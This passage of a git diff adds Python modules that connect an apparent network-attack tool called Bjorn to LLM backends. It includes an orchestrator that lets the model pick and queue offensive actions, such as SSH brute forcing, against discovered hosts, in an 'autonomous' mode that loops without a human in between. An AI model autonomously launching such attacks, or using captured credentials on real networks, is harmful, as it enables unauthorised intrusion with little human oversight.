return f"Always respond in {name}."
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# LaRuche / LAND discovery
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _start_laruche_discovery(self) -> None:
|
||||
"""Launch background mDNS discovery for LaRuche/LAND nodes (non-blocking)."""
|
||||
manual_url = self._cfg("llm_laruche_url", "")
|
||||
if manual_url:
|
||||
with self._laruche_lock:
|
||||
self._laruche_url = manual_url.rstrip("/")
|
||||
logger.info(f"LaRuche: manual URL configured → {self._laruche_url}")
|
||||
return
|
||||
|
||||
stop_event = threading.Event()
|
||||
self._discovery_stop = stop_event
|
||||
|
||||
def _on_found(url: str) -> None:
|
||||
with self._laruche_lock:
|
||||
if self._laruche_url != url:
|
||||
self._laruche_url = url
|
||||
logger.info(f"LaRuche: discovered LAND node → {url}")
|
||||
self._discovery_active = True
|
||||
|
||||
def _run() -> None:
|
||||
try:
|
||||
land_protocol.discover_node(_on_found, stop_event, logger=logger)
|
||||
except Exception as e:
|
||||
logger.warning(f"LAND discovery error: {e}")
|
||||
|
||||
threading.Thread(target=_run, daemon=True, name="LANDDiscovery").start()
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Public API
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def complete(
|
||||
self,
|
||||
messages: List[Dict[str, str]],
|
||||
max_tokens: Optional[int] = None,
|
||||
system: Optional[str] = None,
|
||||
timeout: Optional[int] = None,
|
||||
tools: Optional[List[Dict]] = None,
|
||||
) -> Optional[str]:
|
||||
"""
|
||||
Send a chat completion request through the configured cascade.
|
||||
|
||||
Args:
|
||||
messages: List of {"role": "user"|"assistant", "content": "..."}
|
||||
max_tokens: Override llm_max_tokens config value
|
||||
system: System prompt (prepended if supported by backend)
|
||||
timeout: Override llm_timeout_s config value
|
||||
|
||||
Returns:
|
||||
str response, or None if all backends fail / LLM disabled
|
||||
"""
|
||||
if not self._is_enabled():
|
||||
return None
|
||||
|
||||
max_tok = max_tokens or int(self._cfg("llm_max_tokens", 500))
|
||||
tout = timeout or int(self._cfg("llm_timeout_s", 30))
|
||||
backend = self._cfg("llm_backend", "auto")
|
||||
|
||||
if backend == "auto":
|
||||
order = ["laruche", "ollama", "api"]
|
||||
else:
|
||||
order = [backend]
|
||||
|
||||
for b in order:
|
||||
try:
|
||||
result = self._dispatch(b, messages, max_tok, tout, system, tools)
|
||||
if result:
|
||||
logger.info(f"LLM response from [{b}] (len={len(result)})")
|
||||
return result
|
||||
else:
|
||||
logger.warning(f"LLM backend [{b}] returned empty response - skipping")
|
||||
except Exception as exc:
|
||||
logger.warning(f"LLM backend [{b}] failed: {exc}")
|
||||
|
||||
logger.debug("All LLM backends failed - returning None (template fallback)")
|
||||
return None
|
||||
|
||||
def generate_comment(
|
||||
self,
|
||||
status: str,
|
||||
params: Optional[Dict[str, Any]] = None,
|
||||
) -> Optional[str]:
|
||||
"""
|
||||
Generate a short EPD status comment (≤ ~12 words).
|
||||
Used by comment.py when llm_comments_enabled=True.
|
||||
"""
|
||||
if not self._is_enabled():
|
||||
return None
|
||||
|
||||
lang = self._lang_instruction()
|
||||
custom_comment = str(self._cfg("llm_system_prompt_comment", "") or "").strip()
|
||||
if custom_comment:
|
||||
system = custom_comment + (f" {lang}" if lang else "")
|
||||
else:
|
||||
system = (
|
||||
"You are Bjorn, a terse Norse-themed autonomous security AI. "
|
||||
"Reply with ONE sentence of at most 12 words as a status comment. "
|
||||
"Be cryptic, dark, and technical. No punctuation at the end."
|
||||
+ (f" {lang}" if lang else "")
|
||||
)
|
||||
params_str = f" Context: {json.dumps(params)}" if params else ""
|
||||
prompt = f"Current status: {status}.{params_str} Write a brief status comment."
|
||||
|
||||
return self.complete(
|
||||
[{"role": "user", "content": prompt}],
|
||||
max_tokens=int(self._cfg("llm_comment_max_tokens", 80)),
|
||||
system=system,
|
||||
timeout=8, # Short timeout for EPD - fall back fast
|
||||
)
|
||||
|
||||
def chat(
|
||||
self,
|
||||
user_message: str,
|
||||
session_id: str = "default",
|
||||
system: Optional[str] = None,
|
||||
) -> Optional[str]:
|
||||
"""
|
||||
Stateful chat with Bjorn - maintains conversation history per session.
|
||||
"""
|
||||
if not self._is_enabled():
|
||||
return "LLM is disabled. Enable it in Settings → LLM Bridge."
|
||||
|
||||
max_hist = int(self._cfg("llm_chat_history_size", 20))
|
||||
|
||||
if system is None:
|
||||
system = self._build_system_prompt()
|
||||
|
||||
with self._hist_lock:
|
||||
history = self._chat_histories.setdefault(session_id, [])
|
||||
history.append({"role": "user", "content": user_message})
|
||||
# Keep history bounded
|
||||
if len(history) > max_hist:
|
||||
history[:] = history[-max_hist:]
|
||||
messages = list(history)
|
||||
|
||||
tools = _BJORN_TOOLS if self._cfg("llm_chat_tools_enabled", False) else None
|
||||
response = self.complete(messages, system=system, tools=tools)
|
||||
|
||||
if response:
|
||||
with self._hist_lock:
|
||||
self._chat_histories[session_id].append(
|
||||
{"role": "assistant", "content": response}
|
||||
)
|
||||
|
||||
return response or "No LLM backend available. Check Settings → LLM Bridge."
|
||||
|
||||
def clear_history(self, session_id: str = "default") -> None:
|
||||
with self._hist_lock:
|
||||
self._chat_histories.pop(session_id, None)
|
||||
|
||||
def status(self) -> Dict[str, Any]:
|
||||
"""Return current bridge status for the web UI."""
|
||||
with self._laruche_lock:
|
||||
laruche = self._laruche_url
|
||||
|
||||
return {
|
||||
"enabled": self._is_enabled(),
|
||||
"backend": self._cfg("llm_backend", "auto"),
|
||||
"laruche_url": laruche,
|
||||
"laruche_discovery": self._discovery_active,
|
||||
"ollama_url": self._cfg("llm_ollama_url", "http://127.0.0.1:11434"),
|
||||
"ollama_model": self._cfg("llm_ollama_model", "phi3:mini"),
|
||||
"api_provider": self._cfg("llm_api_provider", "anthropic"),
|
||||
"api_model": self._cfg("llm_api_model", "claude-haiku-4-5-20251001"),
|
||||
"api_key_set": bool(self._cfg("llm_api_key", "")),
|
||||
}
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Backend dispatcher
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _dispatch(
|
||||
self,
|
||||
backend: str,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
tools: Optional[List[Dict]] = None,
|
||||
) -> Optional[str]:
|
||||
if backend == "laruche":
|
||||
return self._call_laruche(messages, max_tokens, timeout, system)
|
||||
if backend == "ollama":
|
||||
return self._call_ollama(messages, max_tokens, timeout, system)
|
||||
if backend == "api":
|
||||
return self._call_api(messages, max_tokens, timeout, system, tools)
|
||||
return None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# LaRuche backend (LAND /infer endpoint)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _call_laruche(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
) -> Optional[str]:
|
||||
with self._laruche_lock:
|
||||
url = self._laruche_url
|
||||
if not url:
|
||||
return None
|
||||
|
||||
# Build flat prompt string (LAND /infer expects a single prompt)
|
||||
prompt_parts = []
|
||||
if system:
|
||||
prompt_parts.append(f"[System]: {system}")
|
||||
for m in messages:
|
||||
role = m.get("role", "user").capitalize()
|
||||
prompt_parts.append(f"[{role}]: {m.get('content', '')}")
|
||||
prompt = "\n".join(prompt_parts)
|
||||
|
||||
model = self._cfg("llm_laruche_model", "") or None
|
||||
return land_protocol.infer(url, prompt, max_tokens=max_tokens, capability="llm", model=model, timeout=timeout)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Ollama backend (/api/chat)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _call_ollama(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
) -> Optional[str]:
|
||||
base = self._cfg("llm_ollama_url", "http://127.0.0.1:11434").rstrip("/")
|
||||
model = self._cfg("llm_ollama_model", "phi3:mini")
|
||||
|
||||
# Ollama /api/chat supports system messages natively
|
||||
ollama_messages = []
|
||||
if system:
|
||||
ollama_messages.append({"role": "system", "content": system})
|
||||
ollama_messages.extend(messages)
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"messages": ollama_messages,
|
||||
"stream": False,
|
||||
"options": {"num_predict": max_tokens},
|
||||
}
|
||||
data = json.dumps(payload).encode()
|
||||
req = urllib.request.Request(
|
||||
f"{base}/api/chat",
|
||||
data=data,
|
||||
headers={"Content-Type": "application/json"},
|
||||
method="POST",
|
||||
)
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
raw_bytes = resp.read().decode()
|
||||
except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
|
||||
logger.warning(f"Ollama network error: {e}")
|
||||
return None
|
||||
try:
|
||||
body = json.loads(raw_bytes)
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"Ollama returned invalid JSON: {e}")
|
||||
return None
|
||||
return body.get("message", {}).get("content") or None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# External API backend (Anthropic / OpenAI / OpenRouter)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _call_api(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
tools: Optional[List[Dict]] = None,
|
||||
) -> Optional[str]:
|
||||
provider = self._cfg("llm_api_provider", "anthropic")
|
||||
api_key = self._cfg("llm_api_key", "")
|
||||
if not api_key:
|
||||
return None
|
||||
|
||||
if provider == "anthropic":
|
||||
return self._call_anthropic(messages, max_tokens, timeout, system, api_key, tools)
|
||||
else:
|
||||
# OpenAI-compatible (openai / openrouter)
|
||||
return self._call_openai_compat(messages, max_tokens, timeout, system, api_key)
|
||||
|
||||
def _call_anthropic(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
api_key: str,
|
||||
tools: Optional[List[Dict]] = None,
|
||||
) -> Optional[str]:
|
||||
"""Call Anthropic Messages API with optional agentic tool-calling loop."""
|
||||
model = self._cfg("llm_api_model", "claude-haiku-4-5-20251001")
|
||||
base_url = self._cfg("llm_api_base_url", "") or "https://api.anthropic.com"
|
||||
api_url = f"{base_url.rstrip('/')}/v1/messages"
|
||||
headers = {
|
||||
"Content-Type": "application/json",
|
||||
"x-api-key": api_key,
|
||||
"anthropic-version": "2023-06-01",
|
||||
}
|
||||
|
||||
current_messages = list(messages)
|
||||
|
||||
for _round in range(6): # max 5 tool-call rounds + 1 final
|
||||
payload: Dict[str, Any] = {
|
||||
"model": model,
|
||||
"max_tokens": max_tokens,
|
||||
"messages": current_messages,
|
||||
}
|
||||
if system:
|
||||
payload["system"] = system
|
||||
if tools:
|
||||
payload["tools"] = tools
|
||||
|
||||
data = json.dumps(payload).encode()
|
||||
req = urllib.request.Request(api_url, data=data, headers=headers, method="POST")
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
raw_bytes = resp.read().decode()
|
||||
except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
|
||||
logger.warning(f"Anthropic network error: {e}")
|
||||
return None
|
||||
try:
|
||||
body = json.loads(raw_bytes)
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"Anthropic returned invalid JSON: {e}")
|
||||
return None
|
||||
|
||||
stop_reason = body.get("stop_reason")
|
||||
content = body.get("content", [])
|
||||
|
||||
if stop_reason != "tool_use" or not tools:
|
||||
# Final text response
|
||||
for block in content:
|
||||
if isinstance(block, dict) and block.get("type") == "text":
|
||||
return block.get("text") or None
|
||||
return None
|
||||
|
||||
# ---- tool_use round ----
|
||||
current_messages.append({"role": "assistant", "content": content})
|
||||
tool_results = []
|
||||
for block in content:
|
||||
if isinstance(block, dict) and block.get("type") == "tool_use":
|
||||
result_text = self._execute_tool(block["name"], block.get("input", {}))
|
||||
logger.debug(f"Tool [{block['name']}] → {result_text[:200]}")
|
||||
tool_results.append({
|
||||
"type": "tool_result",
|
||||
"tool_use_id": block["id"],
|
||||
"content": result_text,
|
||||
})
|
||||
if not tool_results:
|
||||
break
|
||||
current_messages.append({"role": "user", "content": tool_results})
|
||||
|
||||
return None
|
||||
|
||||
def _execute_tool(self, name: str, inputs: Dict) -> str:
|
||||
"""Execute a Bjorn tool by name and return a JSON string result."""
|
||||
try:
|
||||
import mcp_server
|
||||
except Exception as e:
|
||||
return json.dumps({"error": f"mcp_server unavailable: {e}"})
|
||||
|
||||
allowed: List[str] = self._cfg("mcp_allowed_tools", [])
|
||||
if name not in allowed:
|
||||
return json.dumps({"error": f"Tool '{name}' is not enabled in Bjorn MCP config."})
|
||||
|
||||
try:
|
||||
if name == "get_hosts":
|
||||
return mcp_server._impl_get_hosts(inputs.get("alive_only", True))
|
||||
if name == "get_vulnerabilities":
|
||||
return mcp_server._impl_get_vulnerabilities(
|
||||
inputs.get("host_ip") or None, inputs.get("limit", 100)
|
||||
)
|
||||
if name == "get_credentials":
|
||||
return mcp_server._impl_get_credentials(
|
||||
inputs.get("service") or None, inputs.get("limit", 100)
|
||||
)
|
||||
if name == "get_action_history":
|
||||
return mcp_server._impl_get_action_history(
|
||||
inputs.get("limit", 50), inputs.get("action_name") or None
|
||||
)
|
||||
if name == "get_status":
|
||||
return mcp_server._impl_get_status()
|
||||
if name == "run_action":
|
||||
action_name = inputs.get("action_name")
|
||||
target_ip = inputs.get("target_ip")
|
||||
if not action_name or not target_ip:
|
||||
return json.dumps({"error": "run_action requires 'action_name' and 'target_ip'"})
|
||||
return mcp_server._impl_run_action(
|
||||
action_name, target_ip, inputs.get("target_mac", "")
|
||||
)
|
||||
if name == "query_db":
|
||||
sql = inputs.get("sql")
|
||||
if not sql:
|
||||
return json.dumps({"error": "query_db requires 'sql'"})
|
||||
return mcp_server._impl_query_db(sql, inputs.get("params"))
|
||||
return json.dumps({"error": f"Unknown tool: {name}"})
|
||||
except Exception as e:
|
||||
return json.dumps({"error": str(e)})
|
||||
|
||||
def _call_openai_compat(
|
||||
self,
|
||||
messages: List[Dict],
|
||||
max_tokens: int,
|
||||
timeout: int,
|
||||
system: Optional[str],
|
||||
api_key: str,
|
||||
) -> Optional[str]:
|
||||
"""Call OpenAI-compatible API (OpenAI / OpenRouter / local)."""
|
||||
model = self._cfg("llm_api_model", "gpt-4o-mini")
|
||||
base_url = (
|
||||
self._cfg("llm_api_base_url", "")
|
||||
or "https://api.openai.com"
|
||||
)
|
||||
|
||||
oai_messages = []
|
||||
if system:
|
||||
oai_messages.append({"role": "system", "content": system})
|
||||
oai_messages.extend(messages)
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"messages": oai_messages,
|
||||
"max_tokens": max_tokens,
|
||||
}
|
||||
data = json.dumps(payload).encode()
|
||||
req = urllib.request.Request(
|
||||
f"{base_url.rstrip('/')}/v1/chat/completions",
|
||||
data=data,
|
||||
headers={
|
||||
"Content-Type": "application/json",
|
||||
"Authorization": f"Bearer {api_key}",
|
||||
},
|
||||
method="POST",
|
||||
)
|
||||
try:
|
||||
with urllib.request.urlopen(req, timeout=timeout) as resp:
|
||||
raw_bytes = resp.read().decode()
|
||||
except (urllib.error.URLError, socket.timeout, ConnectionError, OSError) as e:
|
||||
logger.warning(f"OpenAI-compat network error: {e}")
|
||||
return None
|
||||
try:
|
||||
body = json.loads(raw_bytes)
|
||||
except json.JSONDecodeError as e:
|
||||
logger.warning(f"OpenAI-compat returned invalid JSON: {e}")
|
||||
return None
|
||||
return body.get("choices", [{}])[0].get("message", {}).get("content") or None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# System prompt builder
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _build_system_prompt(self) -> str:
|
||||
try:
|
||||
hosts = self._sd.target_count
|
||||
vulns = self._sd.vuln_count
|
||||
creds = self._sd.cred_count
|
||||
mode = self._sd.operation_mode
|
||||
status = getattr(self._sd, "bjorn_status_text", "IDLE")
|
||||
except Exception:
|
||||
hosts, vulns, creds, mode, status = "?", "?", "?", "?", "IDLE"
|
||||
|
||||
# Use custom prompt if configured, otherwise default
|
||||
custom = str(self._cfg("llm_system_prompt_chat", "") or "").strip()
|
||||
if custom:
|
||||
base = custom
|
||||
else:
|
||||
base = (
|
||||
f"You are Bjorn, an autonomous network security AI assistant running on a Raspberry Pi. "
|
||||
f"Current state: {hosts} hosts discovered, {vulns} vulnerabilities, {creds} credentials captured. "
|
||||
f"Operation mode: {mode}. Current action: {status}. "
|
||||
f"Answer security questions concisely and technically. "
|
||||
f"You can discuss network topology, vulnerabilities, and suggest next steps. "
|
||||
f"Use brief Norse references occasionally. Never break character."
|
||||
)
|
||||
|
||||
# Inject user profile if set
|
||||
user_name = str(self._cfg("llm_user_name", "") or "").strip()
|
||||
user_bio = str(self._cfg("llm_user_bio", "") or "").strip()
|
||||
if user_name:
|
||||
base += f"\nThe operator's name is {user_name}."
|
||||
if user_bio:
|
||||
base += f" {user_bio}"
|
||||
|
||||
lang = self._lang_instruction()
|
||||
return base + (f" {lang}" if lang else "")
|
||||
743
llm_orchestrator.py
Normal file
743
llm_orchestrator.py
Normal file
@@ -0,0 +1,743 @@
|
||||
"""llm_orchestrator.py - LLM-driven scheduling layer (advisor or autonomous mode)."""
|
||||
|
||||
import json
|
||||
import threading
|
||||
import time
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="llm_orchestrator.py", level=20)
|
||||
|
||||
# Priority levels (must stay above normal scheduler/queue to be useful)
|
||||
_ADVISOR_PRIORITY = 85 # advisor > MCP (80) > normal (50) > scheduler (40)
|
||||
_AUTONOMOUS_PRIORITY = 82
|
||||
|
||||
|
||||
class LLMOrchestrator:
|
||||
"""
|
||||
LLM-based orchestration layer.
|
||||
|
||||
advisor mode - called from orchestrator background tasks; LLM suggests one action.
|
||||
autonomous mode - runs its own thread; LLM loops with full tool-calling.
|
||||
"""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self._sd = shared_data
|
||||
self._thread: Optional[threading.Thread] = None
|
||||
self._stop = threading.Event()
|
||||
self._last_fingerprint: Optional[tuple] = None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Lifecycle
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def start(self) -> None:
|
||||
mode = self._mode()
|
||||
if mode == "autonomous":
|
||||
if self._thread and self._thread.is_alive():
|
||||
return
|
||||
self._stop.clear()
|
||||
self._thread = threading.Thread(
|
||||
target=self._autonomous_loop, daemon=True, name="LLMOrchestrator"
|
||||
)
|
||||
self._thread.start()
|
||||
logger.info("LLM Orchestrator started (autonomous)")
|
||||
elif mode == "advisor":
|
||||
logger.info("LLM Orchestrator ready (advisor - called from background tasks)")
|
||||
|
||||
def stop(self) -> None:
|
||||
self._stop.set()
|
||||
if self._thread and self._thread.is_alive():
|
||||
self._thread.join(timeout=15)
|
||||
self._thread = None
|
||||
|
||||
def restart_if_mode_changed(self) -> None:
|
||||
"""
|
||||
Call from the orchestrator main loop to react to runtime config changes.
|
||||
Starts/stops the autonomous thread when the mode changes.
|
||||
"""
|
||||
mode = self._mode()
|
||||
running = self._thread is not None and self._thread.is_alive()
|
||||
|
||||
if mode == "autonomous" and not running and self._is_llm_enabled():
|
||||
self.start()
|
||||
elif mode != "autonomous" and running:
|
||||
self.stop()
|
||||
|
||||
def is_active(self) -> bool:
|
||||
return self._thread is not None and self._thread.is_alive()
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Config helpers
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _mode(self) -> str:
|
||||
return str(self._sd.config.get("llm_orchestrator_mode", "none"))
|
||||
|
||||
def _is_llm_enabled(self) -> bool:
|
||||
return bool(self._sd.config.get("llm_enabled", False))
|
||||
|
||||
def _allowed_actions(self) -> List[str]:
|
||||
"""
|
||||
Bjorn action module names the LLM may queue via run_action.
|
||||
Falls back to all loaded action names if empty.
|
||||
NOTE: These are action MODULE names (e.g. 'NetworkScanner', 'SSHBruteforce'),
|
||||
NOT MCP tool names (get_hosts, run_action, etc.).
|
||||
"""
|
||||
custom = self._sd.config.get("llm_orchestrator_allowed_actions", [])
|
||||
if custom:
|
||||
return list(custom)
|
||||
# Auto-discover from loaded actions
|
||||
try:
|
||||
loaded = getattr(self._sd, 'loaded_action_names', None)
|
||||
if loaded:
|
||||
return list(loaded)
|
||||
except Exception:
|
||||
pass
|
||||
# Fallback: ask the DB for known action names
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT DISTINCT action_name FROM action_queue ORDER BY action_name"
|
||||
)
|
||||
if rows:
|
||||
return [r["action_name"] for r in rows]
|
||||
except Exception:
|
||||
pass
|
||||
return []
|
||||
|
||||
def _max_actions(self) -> int:
|
||||
return max(1, int(self._sd.config.get("llm_orchestrator_max_actions", 3)))
|
||||
|
||||
def _interval(self) -> int:
|
||||
return max(30, int(self._sd.config.get("llm_orchestrator_interval_s", 60)))
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Advisor mode (called externally from orchestrator background tasks)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def advise(self) -> Optional[str]:
|
||||
"""
|
||||
Ask the LLM for ONE tactical action recommendation.
|
||||
Returns the action name if one was queued, else None.
|
||||
"""
|
||||
if not self._is_llm_enabled() or self._mode() != "advisor":
|
||||
return None
|
||||
|
||||
try:
|
||||
from llm_bridge import LLMBridge
|
||||
|
||||
allowed = self._allowed_actions()
|
||||
if not allowed:
|
||||
return None
|
||||
|
||||
snapshot = self._build_snapshot()
|
||||
real_ips = snapshot.get("VALID_TARGET_IPS", [])
|
||||
ip_list_str = ", ".join(real_ips) if real_ips else "(none)"
|
||||
|
||||
system = (
|
||||
"You are Bjorn's tactical advisor. Review the current network state "
|
||||
"and suggest ONE action to queue, or nothing if the queue is sufficient. "
|
||||
"Reply ONLY with valid JSON - no markdown, no commentary.\n"
|
||||
'Format when action needed: {"action": "ActionName", "target_ip": "1.2.3.4", "reason": "brief"}\n'
|
||||
'Format when nothing needed: {"action": null}\n'
|
||||
"action must be exactly one of: " + ", ".join(allowed) + "\n"
|
||||
f"target_ip MUST be one of these exact IPs: {ip_list_str}\n"
|
||||
"NEVER use placeholder IPs. Only use IPs from the hosts_alive list."
|
||||
)
|
||||
prompt = (
|
||||
f"Current Bjorn state:\n{json.dumps(snapshot, indent=2)}\n\n"
|
||||
"Suggest one action or null."
|
||||
)
|
||||
|
||||
raw = LLMBridge().complete(
|
||||
[{"role": "user", "content": prompt}],
|
||||
system=system,
|
||||
max_tokens=150,
|
||||
timeout=20,
|
||||
)
|
||||
if not raw:
|
||||
return None
|
||||
|
||||
return self._apply_advisor_response(raw, allowed)
|
||||
|
||||
except Exception as e:
|
||||
logger.debug(f"LLM advisor error: {e}")
|
||||
return None
|
||||
|
||||
def _apply_advisor_response(self, raw: str, allowed: List[str]) -> Optional[str]:
|
||||
"""Parse advisor JSON and queue the suggested action. Returns action name or None."""
|
||||
try:
|
||||
text = raw.strip()
|
||||
# Strip markdown fences if the model added them
|
||||
if "```" in text:
|
||||
parts = text.split("```")
|
||||
text = parts[1] if len(parts) > 1 else parts[0]
|
||||
if text.startswith("json"):
|
||||
text = text[4:]
|
||||
|
||||
data = json.loads(text.strip())
|
||||
action = data.get("action")
|
||||
if not action:
|
||||
logger.debug("LLM advisor: no action suggested this cycle")
|
||||
return None
|
||||
|
||||
if action not in allowed:
|
||||
logger.warning(f"LLM advisor suggested disallowed action '{action}' - ignored")
|
||||
return None
|
||||
|
||||
target_ip = str(data.get("target_ip", "")).strip()
|
||||
reason = str(data.get("reason", "llm_advisor"))[:120]
|
||||
|
||||
mac = self._resolve_mac(target_ip)
|
||||
|
||||
self._sd.db.queue_action(
|
||||
action_name=action,
|
||||
mac=mac,
|
||||
ip=target_ip,
|
||||
priority=_ADVISOR_PRIORITY,
|
||||
trigger="llm_advisor",
|
||||
metadata={
|
||||
"decision_method": "llm_advisor",
|
||||
"decision_origin": "llm",
|
||||
"ai_reason": reason,
|
||||
},
|
||||
)
|
||||
try:
|
||||
self._sd.queue_event.set()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
logger.info(f"[LLM_ADVISOR] → {action} @ {target_ip}: {reason}")
|
||||
return action
|
||||
|
||||
except json.JSONDecodeError:
|
||||
logger.warning(f"LLM advisor: invalid JSON response: {raw[:200]}")
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.debug(f"LLM advisor apply error: {e}")
|
||||
return None
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Autonomous mode (own thread)
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _autonomous_loop(self) -> None:
|
||||
logger.info("LLM Orchestrator autonomous loop starting")
|
||||
while not self._stop.is_set():
|
||||
try:
|
||||
if self._is_llm_enabled() and self._mode() == "autonomous":
|
||||
self._run_autonomous_cycle()
|
||||
else:
|
||||
# Mode was switched off at runtime - stop thread
|
||||
break
|
||||
except Exception as e:
|
||||
logger.error(f"LLM autonomous cycle error: {e}")
|
||||
|
||||
self._stop.wait(self._interval())
|
||||
|
||||
logger.info("LLM Orchestrator autonomous loop stopped")
|
||||
|
||||
def _compute_fingerprint(self) -> tuple:
|
||||
"""
|
||||
Compact state fingerprint: (hosts, vulns, creds, last_completed_queue_id).
|
||||
Only increases are meaningful - a host going offline is not an opportunity.
|
||||
"""
|
||||
try:
|
||||
hosts = int(getattr(self._sd, "target_count", 0))
|
||||
vulns = int(getattr(self._sd, "vuln_count", 0))
|
||||
creds = int(getattr(self._sd, "cred_count", 0))
|
||||
row = self._sd.db.query_one(
|
||||
"SELECT MAX(id) AS mid FROM action_queue WHERE status IN ('success','failed')"
|
||||
)
|
||||
last_id = int(row["mid"]) if row and row["mid"] is not None else 0
|
||||
return (hosts, vulns, creds, last_id)
|
||||
except Exception:
|
||||
return (0, 0, 0, 0)
|
||||
|
||||
def _has_actionable_change(self, fp: tuple) -> bool:
|
||||
"""
|
||||
Return True only if something *increased* since the last cycle:
|
||||
- new host discovered (hosts ↑)
|
||||
- new vulnerability found (vulns ↑)
|
||||
- new credential captured (creds ↑)
|
||||
- an action completed (last_id ↑)
|
||||
A host going offline (hosts ↓) is not an actionable event.
|
||||
"""
|
||||
if self._last_fingerprint is None:
|
||||
return True # first cycle always runs
|
||||
return any(fp[i] > self._last_fingerprint[i] for i in range(len(fp)))
|
||||
|
||||
def _run_autonomous_cycle(self) -> None:
|
||||
"""
|
||||
One autonomous cycle.
|
||||
|
||||
Two paths based on backend capability:
|
||||
A) API backend (Anthropic) → agentic tool-calling loop
|
||||
B) LaRuche / Ollama → snapshot-based JSON prompt (no tool-calling)
|
||||
|
||||
Path B injects the full network state into the prompt and asks the LLM
|
||||
to reply with a JSON array of actions. This works with any text-only LLM.
|
||||
"""
|
||||
# Skip if nothing actionable changed (save tokens)
|
||||
if self._sd.config.get("llm_orchestrator_skip_if_no_change", True):
|
||||
fp = self._compute_fingerprint()
|
||||
if not self._has_actionable_change(fp):
|
||||
logger.debug("LLM autonomous: no actionable change, skipping cycle (no tokens used)")
|
||||
return
|
||||
self._last_fingerprint = fp
|
||||
|
||||
try:
|
||||
from llm_bridge import LLMBridge, _BJORN_TOOLS
|
||||
except ImportError as e:
|
||||
logger.warning(f"LLM Orchestrator: cannot import llm_bridge: {e}")
|
||||
return
|
||||
|
||||
bridge = LLMBridge()
|
||||
allowed = self._allowed_actions()
|
||||
max_act = self._max_actions()
|
||||
|
||||
# Detect if the active backend supports tool-calling
|
||||
backend = self._sd.config.get("llm_backend", "auto")
|
||||
supports_tools = (backend == "api") or (
|
||||
backend == "auto" and not bridge._laruche_url
|
||||
and not self._ollama_reachable()
|
||||
)
|
||||
|
||||
if supports_tools:
|
||||
response = self._cycle_with_tools(bridge, allowed, max_act)
|
||||
else:
|
||||
response = self._cycle_without_tools(bridge, allowed, max_act)
|
||||
|
||||
if response:
|
||||
log_reasoning = self._sd.config.get("llm_orchestrator_log_reasoning", False)
|
||||
prompt_desc = f"Autonomous cycle (tools={'yes' if supports_tools else 'no'})"
|
||||
if log_reasoning:
|
||||
logger.info(f"[LLM_ORCH_REASONING]\n{response}")
|
||||
self._push_to_chat(bridge, prompt_desc, response)
|
||||
else:
|
||||
logger.info(f"[LLM_AUTONOMOUS] {response[:300]}")
|
||||
|
||||
def _ollama_reachable(self) -> bool:
|
||||
"""Quick check if Ollama is up (for backend detection)."""
|
||||
try:
|
||||
base = self._sd.config.get("llm_ollama_url", "http://127.0.0.1:11434").rstrip("/")
|
||||
import urllib.request
|
||||
urllib.request.urlopen(f"{base}/api/tags", timeout=2)
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
# ------ Path A: agentic tool-calling (Anthropic API only) ------
|
||||
|
||||
def _cycle_with_tools(self, bridge, allowed: List[str], max_act: int) -> Optional[str]:
|
||||
"""Full agentic loop: LLM calls MCP tools and queues actions."""
|
||||
from llm_bridge import _BJORN_TOOLS
|
||||
|
||||
read_only = {"get_hosts", "get_vulnerabilities", "get_credentials",
|
||||
"get_action_history", "get_status", "query_db"}
|
||||
tools = [
|
||||
t for t in _BJORN_TOOLS
|
||||
if t["name"] in read_only or t["name"] == "run_action"
|
||||
]
|
||||
|
||||
system = self._build_autonomous_system_prompt(allowed, max_act)
|
||||
prompt = (
|
||||
"Start a new orchestration cycle. "
|
||||
"Use get_status and get_hosts to understand the current state. "
|
||||
f"Then queue up to {max_act} high-value action(s) via run_action. "
|
||||
"When done, summarise what you queued and why."
|
||||
)
|
||||
|
||||
return bridge.complete(
|
||||
[{"role": "user", "content": prompt}],
